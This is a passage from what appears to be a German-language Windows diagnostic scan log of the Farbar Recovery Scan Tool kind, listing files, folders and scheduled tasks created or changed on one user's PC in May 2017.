2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll 2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll 2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll 2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll 2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\TSWorkspace.dll 2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe 2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll 2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk 2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver 2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive 2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini 2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG 2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2017-05-07 
18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\AppVEntSubsystemController.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 
_____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\LockHostingFramework.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv 2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv 2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 
_____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ 
(Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin 2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild 2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles 2017-05-07 18:09 - 2017-02-10 12:26 
- 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe 2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe 2017-05-07 17:23 - 2017-05-22 18:36 - 02049386 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml 2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml 2017-05-07 17:17 - 2017-05-22 18:29 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2 2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater 2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} 2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} 2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS 2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ 
C:\WINDOWS\System32\Tasks\SamsungMagician 2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared 2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino 2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten 2017-05-07 17:13 - 2017-05-22 18:28 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin 2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD 2017-05-07 17:13 - 2017-05-16 18:16 
- 00000000 ____D C:\WINDOWS\system32\SleepStudy 2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS 2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll 2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys 2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther 2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk 2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP 2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP 2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP 2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard 2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-22 18:36 - 2017-03-20 06:41 - 00908736 _____ C:\WINDOWS\system32\perfh007.dat 2017-05-22 18:36 - 2017-03-20 06:41 - 00192916 _____ C:\WINDOWS\system32\perfc007.dat 2017-05-22 18:34 - 2017-03-18 13:40 - 00065536 _____ C:\WINDOWS\system32\config\ELAM 2017-05-22 18:34 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla 2017-05-22 18:29 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent 2017-05-22 18:29 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive 2017-05-22 18:28 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI 2017-05-22 18:28 - 2017-02-05 21:38 - 00015703 _____ C:\bdlog.txt 2017-05-22 18:20 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2017-05-22 18:14 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files 